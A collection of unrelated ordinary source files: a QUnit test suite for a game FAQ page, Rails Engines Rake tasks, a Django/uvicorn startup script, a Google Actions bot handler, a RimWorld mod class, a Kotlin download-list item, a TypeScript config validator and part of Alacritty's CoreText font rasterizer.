$('body').append($('<div>', {'id': 'faq_page', }));
}
},
'teardown': function(assert) {
// Do not ignore intermittent failures in this test --- you
// risk breaking the entire suite in hard-to-debug ways
assert.equal(jQuery.active, 0,
"All test functions MUST complete jQuery activity before exiting");
// Delete all elements we expect this module to create
// JS objects
delete Faq.page;
// Page elements
$('#faq_page').remove();
BMTestUtils.deleteEnvMessage();
BMTestUtils.restoreGetParameterByName();
BMTestUtils.restoreGetParameterByName();
// Fail if any other elements were added or removed
BMTestUtils.FaqPost = BMTestUtils.getAllElements();
assert.deepEqual(
BMTestUtils.FaqPost, BMTestUtils.FaqPre,
"After testing, the page should have no unexpected element changes");
}
});
// pre-flight test of whether the Faq module has been loaded
test("test_Faq_is_loaded", function(assert) {
assert.ok(Faq, "The Faq namespace exists");
});
test("test_Faq.showLoggedInPage", function(assert) {
BMTestUtils.setupFakeLogin();
Faq.showLoggedInPage();
var node = document.getElementById('faq_page');
assert.equal(node.nodeName, "DIV",
"#faq_page is a div after showLoggedInPage() is called");
BMTestUtils.cleanupFakeLogin();
});
test("test_Faq.showLoggedOutPage", function(assert) {
Faq.showLoggedOutPage();
var node = document.getElementById('faq_page');
assert.equal(node.nodeName, "DIV",
"#faq_page is a div after showLoggedOutPage() is called");
});
test("test_Faq.showPage", function(assert) {
Faq.showPage();
var node = document.getElementById('faq_page');
assert.equal(node.nodeName, "DIV",
"#faq_page is a div after showPage() is called");
});
test("test_Faq.bodyText", function(assert) {
var node = Faq.bodyText();
assert.equal(node[0].nodeName, "DIV", "bodyText returns a div");
});
test("test_Faq.generalInfo", function(assert) {
var node = Faq.generalInfo();
assert.equal(node[0].nodeName, "DIV", "generalInfo returns a div");
});
test("test_Faq.tableOfContents", function(assert) {
var node = Faq.generalInfo();
assert.equal(node[0].nodeName, "DIV", "tableOfContents returns a DIV");
assert.equal(node[0].childNodes[0].nodeName, "H1", "toc start with an H1");
assert.equal(node[0].childNodes[1].nodeName, "UL", "toc contain a UL");
});
test("test_Faq.gameplayLinks", function(assert) {
var node = Faq.gameplayLinks();
assert.equal(node[0].nodeName, "LI", "gameplayLinks returns a LI");
assert.equal(node[0].childNodes[0].nodeName, "A", "links start with an A");
assert.equal(node[0].childNodes[1].nodeName, "UL", "links contain a UL");
});
test("test_Faq.userprefsLinks", function(assert) {
var node = Faq.userprefsLinks();
assert.equal(node[0].nodeName, "LI", "userprefsLinks returns a LI");
assert.equal(node[0].childNodes[0].nodeName, "A", "links start with an A");
assert.equal(node[0].childNodes[1].nodeName, "UL", "links contain a UL");
});
test("test_Faq.forumLinks", function(assert) {
var node = Faq.forumLinks();
assert.equal(node[0].nodeName, "LI", "forumLinks returns a LI");
assert.equal(node[0].childNodes[0].nodeName, "A", "links start with an A");
assert.equal(node[0].childNodes[1].nodeName, "UL", "links contain a UL");
});
test("test_Faq.unansweredLink", function(assert) {
var node = Faq.unansweredLink();
assert.equal(node[0].nodeName, "LI", "link is a LI");
});
test("test_Faq.content", function(assert) {
var node = Faq.content();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
});
test("test_Faq.gameplayContent", function(assert) {
var node = Faq.gameplayContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H2", "content contains a H2");
});
test("test_Faq.defaultAttackContent", function(assert) {
var node = Faq.defaultAttackContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H3", "content contains a H3");
});
test("test_Faq.buttonSpecialContent", function(assert) {
var node = Faq.buttonSpecialContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H3", "content contains a H3");
});
test("test_Faq.flyingSquirrelContent", function(assert) {
var node = Faq.flyingSquirrelContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H3", "content contains a H3");
});
test("test_Faq.japaneseBeetleContent", function(assert) {
var node = Faq.japaneseBeetleContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H3", "content contains a H3");
});
test("test_Faq.userprefsContent", function(assert) {
var node = Faq.userprefsContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H2", "content contains a H2");
});
test("test_Faq.monitorContent", function(assert) {
var node = Faq.monitorContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H3", "content contains a H3");
});
test("test_Faq.fireOvershootingContent", function(assert) {
var node = Faq.fireOvershootingContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H3", "content contains a H3");
});
test("test_Faq.forumContent", function(assert) {
var node = Faq.forumContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H2", "content contains a H2");
});
test("test_Faq.forumLinkContent", function(assert) {
var node = Faq.forumLinkContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H3", "content contains a H3");
});
test("test_Faq.unansweredContent", function(assert) {
var node = Faq.unansweredContent();
assert.equal(node[0].nodeName, "#document-fragment",
"content contains a document fragment");
assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
assert.equal(node[0].childNodes[1].nodeName, "H3", "content contains a H3");
});
|
# This code lets us redefine existing Rake tasks, which is extremely
# handy for modifying existing Rails rake tasks.
# Credit for the original snippet of code goes to Jeremy Kemper
# http://pastie.caboo.se/9620
unless Rake::TaskManager.methods.include?(:redefine_task)
module Rake
module TaskManager
def redefine_task(task_class, args, &block)
task_name, deps = resolve_args([args])
task_name = task_class.scope_name(@scope, task_name)
deps = [deps] unless deps.respond_to?(:to_ary)
deps = deps.collect {|d| d.to_s }
task = @tasks[task_name.to_s] = task_class.new(task_name, self)
task.application = self
task.add_description(@last_description)
@last_description = nil
task.enhance(deps, &block)
task
end
end
class Task
class << self
def redefine_task(args, &block)
Rake.application.redefine_task(self, [args], &block)
end
end
end
end
end
namespace :db do
namespace :migrate do
desc 'Migrate database and plugins to current status.'
task :all => [ 'db:migrate', 'db:migrate:plugins' ]
desc 'Migrate plugins to current status.'
task({:plugins => :environment}, :version) do |task, args|
version = args[:version] || ENV['VERSION']
Engines.plugins.each do |plugin|
next unless File.exists? plugin.migration_directory
puts "Migrating plugin #{plugin.name} ..."
plugin.migrate(version ? version.to_i : nil)
end
end
desc 'Migrate a specified plugin.'
task({:plugin => :environment}, :name, :version) do |task, args|
name = args[:name] || ENV['NAME']
if plugin = Engines.plugins[name]
version = args[:version] || ENV['VERSION']
puts "Migrating #{plugin.name} to " + (version ? "version #{version}" : 'latest version') + " ..."
plugin.migrate(version ? version.to_i : nil)
else
puts "Plugin #{name} does not exist."
end
end
end
end
namespace :db do
namespace :fixtures do
namespace :plugins do
desc "Load plugin fixtures into the current environment's database."
task :load => :environment do
require 'active_record/fixtures'
ActiveRecord::Base.establish_connection(RAILS_ENV.to_sym)
Dir.glob(File.join(RAILS_ROOT, 'vendor', 'plugins', ENV['PLUGIN'] || '**',
'test', 'fixtures', '*.yml')).each do |fixture_file|
Fixtures.create_fixtures(File.dirname(fixture_file), File.basename(fixture_file, '.*'))
end
end
end
end
end
# this is just a modification of the original task in railties/lib/tasks/documentation.rake,
# because the default task doesn't support subdirectories like <plugin>/app or
# <plugin>/component. These tasks now include every file under a plugin's code paths (see
# Plugin#code_paths).
namespace :doc do
plugins = FileList['vendor/plugins/**'].collect { |plugin| File.basename(plugin) }
namespace :plugins do
# Define doc tasks for each plugin
plugins.each do |plugin|
desc "Create plugin documentation for '#{plugin}'"
Rake::Task.redefine_task(plugin => :environment) do
plugin_base = RAILS_ROOT + "/vendor/plugins/#{plugin}"
options = []
files = Rake::FileList.new
options << "-o doc/plugins/#{plugin}"
options << "--title '#{plugin.titlecase} Plugin Documentation'"
options << '--line-numbers' << '--inline-source'
options << '-T html'
# Include every file in the plugin's code_paths (see Plugin#code_paths)
if Engines.plugins[plugin]
files.include("#{plugin_base}/{#{Engines.plugins[plugin].code_paths.join(",")}}/**/*.rb")
end
if File.exists?("#{plugin_base}/README")
files.include("#{plugin_base}/README")
options << "--main '#{plugin_base}/README'"
end
files.include("#{plugin_base}/CHANGELOG") if File.exists?("#{plugin_base}/CHANGELOG")
if files.empty?
puts "No source files found in #{plugin_base}. No documentation will be generated."
else
options << files.to_s
sh %(rdoc #{options * ' '})
end
end
end
end
end
namespace :test do
task :warn_about_multiple_plugin_testing_with_engines do
puts %{-~============== A Moste Polite Warninge ===========================~-
You may experience issues testing multiple plugins at once when using
the code-mixing features that the engines plugin provides. If you do
experience any problems, please test plugins individually, i.e.
$ rake test:plugins PLUGIN=my_plugin
or use the per-type plugin test tasks:
$ rake test:plugins:units
$ rake test:plugins:functionals
$ rake test:plugins:integration
$ rake test:plugins:all
Report any issues on http://dev.rails-engines.org. Thanks!
-~===============( ... as you were ... )============================~-}
end
namespace :plugins do
desc "Run the plugin tests in vendor/plugins/**/test (or specify with PLUGIN=name)"
task :all => [:warn_about_multiple_plugin_testing_with_engines,
:units, :functionals, :integration]
desc "Run all plugin unit tests"
Rake::TestTask.new(:units => :setup_plugin_fixtures) do |t|
t.pattern = "vendor/plugins/#{ENV['PLUGIN'] || "**"}/test/unit/**/*_test.rb"
t.verbose = true
end
desc "Run all plugin functional tests"
Rake::TestTask.new(:functionals => :setup_plugin_fixtures) do |t|
t.pattern = "vendor/plugins/#{ENV['PLUGIN'] || "**"}/test/functional/**/*_test.rb"
t.verbose = true
end
desc "Integration test engines"
Rake::TestTask.new(:integration => :setup_plugin_fixtures) do |t|
t.pattern = "vendor/plugins/#{ENV['PLUGIN'] || "**"}/test/integration/**/*_test.rb"
t.verbose = true
end
desc "Mirrors plugin fixtures into a single location to help plugin tests"
task :setup_plugin_fixtures => :environment do
Engines::Testing.setup_plugin_fixtures
end
# Patch the default plugin testing task to have setup_plugin_fixtures as a prerequisite
Rake::Task["test:plugins"].prerequisites << "test:plugins:setup_plugin_fixtures"
end
end
|
#!/usr/bin/env bash
echo -e "\e[94m Collecting static...\e[0m"
python manage.py collectstatic --noinput --clear
echo -e "\e[94m Making migrations...\e[0m"
python manage.py makemigrations
python manage.py migrate
echo -e "\e[92m Starting service...\e[0m"
uvicorn conf.asgi:application --uds /uvicorn_socket/uvicorn.socket
|
const gactions = require('actions-on-google')
const _ = require('lodash')
const Session = require('newbot-formats/session/gactions')
const output = require('../output')
module.exports = function ({
app,
converse,
settings
}) {
const propClientId = 'platforms.gactions.signin.clientId'
const clientId = _.get(settings, propClientId)
const action = gactions.actionssdk({
clientId
})
const handle = (conv, input, {
type = 'exec',
signin,
userData
} = {}) => {
const _converse = global.converse || converse
const session = new Session(gactions, conv)
const userId = session.userId()
const options = output(session, settings)
if (type == 'exec') {
return _converse.exec(input, userId, options)
}
return _converse.event(input, {
profile: userData,
signin
}, userId, options)
}
const handleOption = (conv, params, option) => {
return handle(conv, option)
}
const handleSignin = (conv, params, signin) => {
const propName = 'platforms.gactions.signin.event'
const eventName = _.get(settings, propName)
if (!eventName) {
throw '[Gactions] Please, add event name in "' + propName + '" property in "newbot.config.js"'
}
if (!clientId) {
throw '[Gactions] Please, add client Id "' + propClientId + '" property in "newbot.config.js"'
}
return handle(conv, eventName, {
type: 'event',
signin,
userData: conv.user.profile.payload
})
}
action.intent('actions.intent.MAIN', handle)
action.intent('actions.intent.TEXT', handle)
action.intent('actions.intent.OPTION', handleOption)
action.intent('actions.intent.SIGN_IN', handleSignin)
app.post(settings.path || '/gactions', action)
}
|
using System.Linq;
using RimWorld;
using Verse;
namespace MoreThanCapable
{
public class ThoughtWorker_AssignedToBadWork : ThoughtWorker
{
protected override ThoughtState CurrentStateInternal(Pawn p)
{
if (!p.health.hediffSet.HasHediff(def.hediff)) {
return false;
}
var whine = (Hediff_Whine) p.health.hediffSet.GetFirstHediffOfDef(def.hediff);
float severity = whine.Severity;
if (whine.peaked) {
if (severity > 0f) {
return ThoughtState.ActiveAtStage(def.stages.Count - 1);
}
return false;
}
if (severity > 0.4f) {
return ThoughtState.ActiveAtStage(4);
}
if (severity > 0.3f) {
return ThoughtState.ActiveAtStage(3);
}
if (severity > 0.2f) {
return ThoughtState.ActiveAtStage(2);
}
if (severity > 0.1f) {
return ThoughtState.ActiveAtStage(1);
}
if (severity > 0f) {
return ThoughtState.ActiveAtStage(0);
}
return false;
}
}
}
|
package io.github.qkcoder.hermesdownloadersample
import android.graphics.Color
import android.graphics.drawable.GradientDrawable
import android.view.View
import android.widget.ImageView
import android.widget.ProgressBar
import android.widget.TextView
import com.bumptech.glide.Glide
import com.mikepenz.fastadapter.FastAdapter
import com.mikepenz.fastadapter.items.AbstractItem
/**
* * @author tq
* * @email qkcoder@aliyun.com
* * @date 2021/4/29 11:26 下午
* * @desc
**/
class DownloadItem : AbstractItem<DownloadItem.ViewHolder>() {
private var progress: Int = 0
private var url: String? = null
private var name: String? = null
private var cachePath: String? = null
override val layoutRes: Int
get() = R.layout.item_download_list
override val type: Int
get() = 0
fun getUrl(): String? {
return url
}
fun setProgress(progress: Int) {
this.progress = progress
}
fun getProgress(): Int {
return progress
}
fun setCachePath(cachePath: String?) {
this.cachePath = cachePath
}
fun getCachePath(): String? {
return cachePath
}
fun with(progress: Int): DownloadItem {
this.progress = progress
return this
}
fun with(url: String, name: String): DownloadItem {
this.url = url
this.name = name
return this
}
override fun getViewHolder(v: View): ViewHolder {
return ViewHolder(v)
}
class ViewHolder(view: View) : FastAdapter.ViewHolder<DownloadItem>(view) {
private val mTitleView = view.findViewById<TextView>(R.id.title_item_download_list)
private val mProgressBar: ProgressBar =
view.findViewById(R.id.progressbar_item_download_list)
val mDownloadBtn: TextView = view.findViewById(R.id.btn_item_download_list)
private val mImgView: ImageView = view.findViewById<ImageView>(R.id.img_item_download_list)
init {
view.background = createCornerBg()
mDownloadBtn.background = createCornerBg2()
}
override fun bindView(item: DownloadItem, payloads: List<Any>) {
mProgressBar.progress = item.progress
mTitleView.text = item.name
if (item.progress < 100) {
mDownloadBtn.isEnabled = true
mDownloadBtn.text = if (item.progress == 0) "下载" else "下载中"
mImgView.visibility = View.GONE
} else {
mDownloadBtn.isEnabled = false
mDownloadBtn.text = "已下载"
if (mImgView.getTag(R.id.download_item_tag) is Int) {
val tag = mImgView.getTag(R.id.download_item_tag) as Int
if (item.getCachePath()?.length ?: 0 > 0 && tag == absoluteAdapterPosition) {
mImgView.visibility = View.VISIBLE
Glide.with(mImgView.context).load(item.getCachePath()).into(mImgView)
} else {
mImgView.visibility = View.GONE
}
} else {
if (item.getCachePath()?.length ?: 0 > 0) {
mImgView.visibility = View.VISIBLE
Glide.with(mImgView.context).load(item.getCachePath()).into(mImgView)
mImgView.setTag(R.id.download_item_tag, absoluteAdapterPosition)
} else {
mImgView.visibility = View.GONE
}
}
}
}
override fun unbindView(item: DownloadItem) {
}
private fun createCornerBg(): GradientDrawable {
val gradientDrawable = GradientDrawable()
gradientDrawable.shape = GradientDrawable.RECTANGLE
gradientDrawable.setColor(Color.parseColor("#f5f5f5"))
gradientDrawable.cornerRadius = 20f
return gradientDrawable
}
private fun createCornerBg2(): GradientDrawable {
val gradientDrawable = GradientDrawable()
gradientDrawable.shape = GradientDrawable.RECTANGLE
gradientDrawable.setColor(Color.parseColor("#F63939"))
gradientDrawable.cornerRadius = 20f
return gradientDrawable
}
}
}
|
import { IExclude } from "../../interface/config/IExclude.ts";
import { arrayGetUnique } from "../../util/array/get/unique.ts";
import { arrayIsEmpty } from "../../util/array/is/empty.ts";
import { isRegExp } from "../../util/is/regexp.ts";
import { isString } from "../../util/is/string.ts";
import { jsonStringify } from "../../util/json/stringify.ts";
/**
* @name excludeConfig
* @throws TypeError
* @param {Array.<string|RegExp>} propertiesToExclude
* @returns {Array.<string|RegExp>}
*/
export function excludeConfig(propertiesToExclude: IExclude): IExclude {
if (!Array.isArray(propertiesToExclude)) {
throw new TypeError("'Exclude' should be an array");
}
if (arrayIsEmpty(propertiesToExclude)) {
return [];
}
return arrayGetUnique(propertiesToExclude).map((value) => {
if (!isString(value) && !isRegExp(value)) {
throw new TypeError(
`'Exclude' expect array of strings or regular expressions. Value: '${
jsonStringify(value)
}'.`,
);
}
return value;
});
}
|
// Copyright 2016 Joe Wilm, The Alacritty Project Contributors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
//! Font rendering based on CoreText
//!
//! TODO error handling... just search for unwrap.
#![allow(improper_ctypes)]
use std::collections::HashMap;
use std::ptr;
use ::{Slant, Weight, Style};
use core_foundation::base::TCFType;
use core_foundation::string::{CFString, CFStringRef};
use core_foundation::array::CFIndex;
use core_foundation_sys::string::UniChar;
use core_graphics::base::kCGImageAlphaPremultipliedFirst;
use core_graphics::base::CGFloat;
use core_graphics::color_space::CGColorSpace;
use core_graphics::context::{CGContext, CGContextRef};
use core_graphics::font::{CGFont, CGFontRef, CGGlyph};
use core_graphics::geometry::{CGPoint, CGRect, CGSize};
use core_text::font::{CTFont, new_from_descriptor as ct_new_from_descriptor};
use core_text::font_collection::create_for_family;
use core_text::font_collection::get_family_names as ct_get_family_names;
use core_text::font_descriptor::kCTFontDefaultOrientation;
use core_text::font_descriptor::kCTFontHorizontalOrientation;
use core_text::font_descriptor::kCTFontVerticalOrientation;
use core_text::font_descriptor::{CTFontDescriptor, CTFontDescriptorRef, CTFontOrientation};
use core_text::font_descriptor::SymbolicTraitAccessors;
use libc::{size_t, c_int};
use euclid::point::Point2D;
use euclid::rect::Rect;
use euclid::size::Size2D;
use super::{FontDesc, RasterizedGlyph, Metrics, FontKey, GlyphKey};
pub mod cg_color;
use self::cg_color::{CGColorRef, CGColor};
pub mod byte_order;
use self::byte_order::kCGBitmapByteOrder32Host;
use self::byte_order::extract_rgb;
use super::Size;
/// Font descriptor
///
/// The descriptor provides data about a font and supports creating a font.
#[derive(Debug)]
pub struct Descriptor {
family_name: String,
font_name: String,
style_name: String,
display_name: String,
font_path: String,
ct_descriptor: CTFontDescriptor
}
/// Rasterizer, the main type exported by this package
///
/// Given a fontdesc, can rasterize fonts.
pub struct Rasterizer {
fonts: HashMap<FontKey, Font>,
keys: HashMap<(FontDesc, Size), FontKey>,
device_pixel_ratio: f32,
use_thin_strokes: bool,
}
/// Errors occurring when using the core text rasterizer
#[derive(Debug)]
pub enum Error {
/// Tried to rasterize a glyph but it was not available
MissingGlyph(char),
/// Couldn't find font matching description
MissingFont(FontDesc),
/// Requested an operation with a FontKey that isn't known to the rasterizer
FontNotLoaded,
}
impl ::std::error::Error for Error {
fn description(&self) -> &str {
match *self {
Error::MissingGlyph(ref _c) => "couldn't find the requested glyph",
Error::MissingFont(ref _desc) => "couldn't find the requested font",
Error::FontNotLoaded => "tried to operate on font that hasn't been loaded",
}
}
}
impl ::std::fmt::Display for Error {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
match *self {
Error::MissingGlyph(ref c) => {
write!(f, "Glyph not found for char {:?}", c)
},
Error::MissingFont(ref desc) => {
write!(f, "Couldn't find a font with {}\
\n\tPlease check the font config in your alacritty.yml.", desc)
},
Error::FontNotLoaded => {
f.write_str("Tried to use a font that hasn't been loaded")
}
}
}
}
impl ::Rasterize for Rasterizer {
type Err = Error;
fn new(_dpi_x: f32, _dpi_y: f32, device_pixel_ratio: f32, use_thin_strokes: bool) -> Result<Rasterizer, Error> {
println!("device_pixel_ratio: {}", device_pixel_ratio);
Ok(Rasterizer {
fonts: HashMap::new(),
keys: HashMap::new(),
device_pixel_ratio: device_pixel_ratio,
use_thin_strokes: use_thin_strokes,
})
}
/// Get metrics for font specified by FontKey
fn metrics(&self, key: FontKey, _size: Size) -> Result<Metrics, Error> {
// NOTE size is not needed here since the font loaded already contains
// it. It's part of the API due to platform differences.
let font = self.fonts
.get(&key)
.ok_or(Error::FontNotLoaded)?;
Ok(font.metrics())
}
fn load_font(&mut self, desc: &FontDesc, size: Size) -> Result<FontKey, Error> {
self.keys
.get(&(desc.to_owned(), size))
.map(|k| Ok(*k))
.unwrap_or_else(|| {
let font = self.get_font(desc, size)?;
let key = FontKey::next();
self.fonts.insert(key, font);
self.keys.insert((desc.clone(), size), key);
Ok(key)
})
}
/// Get rasterized glyph for given glyph key
fn get_glyph(&mut self, glyph: &GlyphKey) -> Result<RasterizedGlyph, Error> {
let scaled_size = self.device_pixel_ratio * glyph.size.as_f32_pts();
self.fonts
.get(&glyph.font_key)
.ok_or(Error::FontNotLoaded)?
.get_glyph(glyph.c, scaled_size as _, self.use_thin_strokes)
}
}
impl Rasterizer {
fn get_specific_face(
&mut self,
desc: &FontDesc,
style: &str,
size: Size
) -> Result<Font, Error> {
let descriptors = descriptors_for_family(&desc.name[..]);
for descriptor in descriptors {
if descriptor.style_name == style {
// Found the font we want
let scaled_size = size.as_f32_pts() as f64 * self.device_pixel_ratio as f64;
let font = descriptor.to_font(scaled_size);
return Ok(font);
}
}
Err(Error::MissingFont(desc.to_owned()))
}
fn get_matching_face(
&mut self,
desc: &FontDesc,
slant: Slant,
weight: Weight,
size: Size
) -> Result<Font, Error> {
let bold = match weight {
Weight::Bold => true,
_ => false
};
let italic = match slant {
Slant::Normal => false,
_ => true,
};
let scaled_size = size.as_f32_pts() as f64 * self.device_pixel_ratio as f64;
let descriptors = descriptors_for_family(&desc.name[..]);
for descriptor in descriptors {
let font = descriptor.to_font(scaled_size);
if font.is_bold() == bold && font.is_italic() == italic {
// Found the font we want
return Ok(font);
}
}
Err(Error::MissingFont(desc.to_owned()))
}
fn get_font(&mut self, desc: &FontDesc, size: Size) -> Result<Font, Error> {
match desc.style {
Style::Specific(ref style) => self.get_specific_face(desc, style, size),
Style::Description { slant, weight } => {
self.get_matching_face(desc, slant, weight, size)
},
}
}
}
/// Specifies the intended rendering orientation of the font for obtaining glyph metrics
#[derive(Debug)]
pub enum FontOrientation {
Default = kCTFontDefaultOrientation as isize,
Horizontal = kCTFontHorizontalOrientation as isize,
Vertical = kCTFontVerticalOrientation as isize,
}
impl Default for FontOrientation {
fn default() -> FontOrientation {
FontOrientation::Default
}
}
/// A font
#[derive(Clone)]
pub struct Font {
ct_font: CTFont,
cg_font: CGFont,
}
unsafe impl Send for Font {}
/// List all family names
pub fn get_family_names() -> Vec<String> {
// CFArray of CFStringRef
let names = ct_get_family_names();
let mut owned_names = Vec::new();
for name in names.iter() {
let family: CFString = unsafe { TCFType::wrap_under_get_rule(name as CFStringRef) };
owned_names.push(format!("{}", family));
}
owned_names
}
/// Get descriptors for family name
pub fn descriptors_for_family(family: &str) -> Vec<Descriptor> {
let mut out = Vec::new();
let ct_collection = match create_for_family(family) {
Some(c) => c,
None => return out,
};
// CFArray of CTFontDescriptorRef (i think)
let descriptors = ct_collection.get_descriptors();
for descriptor in descriptors.iter() {
let desc: CTFontDescriptor = unsafe {
TCFType::wrap_under_get_rule(descriptor as CTFontDescriptorRef)
};
out.push(Descriptor {
family_name: desc.family_name(),
font_name: desc.font_name(),
style_name: desc.style_name(),
display_name: desc.display_name(),
font_path: desc.font_path(),
ct_descriptor: desc,
});
}
out
}
impl Descriptor {
/// Create a Font from this descriptor
pub fn to_font(&self, size: f64) -> Font {
let ct_font = ct_new_from_descriptor(&self.ct_descriptor, size);
let cg_font = ct_font.copy_to_CGFont();
Font {
ct_font: ct_font,
cg_font: cg_font,
}
}
}
impl Font {
/// The the bounding rect of a glyph
pub fn bounding_rect_for_glyph(
&self,
orientation: FontOrientation,
index: u32
) -> Rect<f64> {
let cg_rect = self.ct_font.get_bounding_rects_for_glyphs(
orientation as CTFontOrientation,
&[index as CGGlyph]
);
Rect::new(
Point2D::new(cg_rect.origin.x, cg_rect.origin.y),
Size2D::new(cg_rect.size.width, cg_rect.size.height),
)
}
pub fn metrics(&self) -> Metrics {
let average_advance = self.glyph_advance('0');
let ascent = self.ct_font.ascent() as f64;
let descent = self.ct_font.descent() as f64;
let leading = self.ct_font.leading() as f64;
let line_height = (ascent + descent + leading + 0.5).floor();
Metrics {
average_advance: average_advance,
line_height: line_height,
}
}
pub fn is_bold(&self) -> bool {
self.ct_font.symbolic_traits().is_bold()
}
pub fn is_italic(&self) -> bool {
self.ct_font.symbolic_traits().is_italic()
}
fn glyph_advance(&self, character: char) -> f64 {
let index = self.glyph_index(character).unwrap();
let indices = [index as CGGlyph];
self.ct_font.get_advances_for_glyphs(
FontOrientation::Default as _,
&indices[0],
ptr::null_mut(),
1
)
}
pub fn get_glyph(&self, character: char, _size: f64, use_thin_strokes: bool) -> Result<RasterizedGlyph, Error> {
let glyph_index = self.glyph_index(character)
.ok_or(Error::MissingGlyph(character))?;
let bounds = self.bounding_rect_for_glyph(Default::default(), glyph_index);
let rasterized_left = bounds.origin.x.floor() as i32;
let rasterized_width =
(bounds.origin.x - (rasterized_left as f64) + bounds.size.width).ceil() as u32;
let rasterized_descent = (-bounds.origin.y).ceil() as i32;
let rasterized_ascent = (bounds.size.height + bounds.origin.y).ceil() as i32;
let rasterized_height = (rasterized_descent + rasterized_ascent) as u32;
if rasterized_width == 0 || rasterized_height == 0 {
return Ok(RasterizedGlyph {
c: ' ',
width: 0,
height: 0,
top: 0,
left: 0,
buf: Vec::new()
});
}
let mut cg_context = CGContext::create_bitmap_context(
rasterized_width as usize,
rasterized_height as usize,
8, // bits per component
rasterized_width as usize * 4,
&CGColorSpace::create_device_rgb(),
kCGImageAlphaPremultipliedFirst | kCGBitmapByteOrder32Host
);
// Give the context an opaque, black background
cg_context.set_rgb_fill_color(0.0, 0.0, 0.0, 1.0);
let context_rect = CGRect::new(
&CGPoint::new(0.0, 0.0),
&CGSize::new(
rasterized_width as f64,
rasterized_height as f64
)
);
cg_context.fill_rect(context_rect);
if use_thin_strokes {
cg_context.set_font_smoothing_style(16);
}
cg_context.set_allows_font_smoothing(true);
cg_context.set_should_smooth_fonts(true);
cg_context.set_allows_font_subpixel_quantization(true);
cg_context.set_should_subpixel_quantize_fonts(true);
cg_context.set_allows_font_subpixel_positioning(true);
cg_context.set_should_subpixel_position_fonts(true);
cg_context.set_allows_antialiasing(true);
cg_context.set_should_antialias(true);
// Set fill color to white for drawing the glyph
cg_context.set_rgb_fill_color(1.0, 1.0, 1.0, 1.0);
let rasterization_origin = CGPoint {
x: -rasterized_left as f64,
y: rasterized_descent as f64,
};
self.ct_font.draw_glyphs(&[glyph_index as CGGlyph],
&[rasterization_origin],
cg_context.clone());
let rasterized_pixels = cg_context.data().to_vec();
let buf = extract_rgb(rasterized_pixels);
Ok(RasterizedGlyph {
c: character,
left: rasterized_left,
top: (bounds.size.height + bounds.origin.y).ceil() as i32,
width: rasterized_width as i32,
height: rasterized_height as i32,
buf: buf,
})
}
fn glyph_index(&self, character: char) -> Option<u32> {
let chars = [character as UniChar];
let mut glyphs = [0 as CGGlyph];
let res = self.ct_font.get_glyphs_for_characters(
&chars[0],
&mut glyphs[0],
1 as CFIndex
);
if res {
Some(glyphs[0] as u32)
} else {
None
}
}
}
/// Additional methods needed to render fonts for Alacritty
///
/// TODO upstream these into core_graphics crate
pub trait CGContextExt {
fn set_allows_font_subpixel_quantization(&self, bool);
fn set_should_subpixel_quantize_fonts(&self, bool);
fn set_allows_font_subpixel_positioning(&self, bool);
fn set_should_subpixel_position_fonts(&self, bool);
fn set_allows_antialiasing(&self, bool);
fn set_should_antialias(&self, bool);
fn fill_rect(&self, rect: CGRect);
fn set_font_smoothing_background_color(&self, color: CGColor);
fn show_glyphs_at_positions(&self, &[CGGlyph], &[CGPoint]);
fn set_font(&self, &CGFont);
fn set_font_size(&self, size: f64);
fn set_font_smoothing_style(&self, style: i32);
}
impl CGContextExt for CGContext {
fn set_allows_font_subpixel_quantization(&self, allows: bool) {
unsafe {
CGContextSetAllowsFontSubpixelQuantization(self.as_concrete_TypeRef(), allows);
}
}
fn set_should_subpixel_quantize_fonts(&self, should: bool) {
unsafe {
CGContextSetShouldSubpixelQuantizeFonts(self.as_concrete_TypeRef(), should);
}
}
fn set_should_subpixel_position_fonts(&self, should: bool) {
unsafe {
CGContextSetShouldSubpixelPositionFonts(self.as_concrete_TypeRef(), should);
}
}
fn set_allows_font_subpixel_positioning(&self, allows: bool) {
unsafe {
CGContextSetAllowsFontSubpixelPositioning(self.as_concrete_TypeRef(), allows);
}
}
fn set_should_antialias(&self, should: bool) {
unsafe {
CGContextSetShouldAntialias(self.as_concrete_TypeRef(), should);
}
}
fn set_allows_antialiasing(&self, allows: bool) {
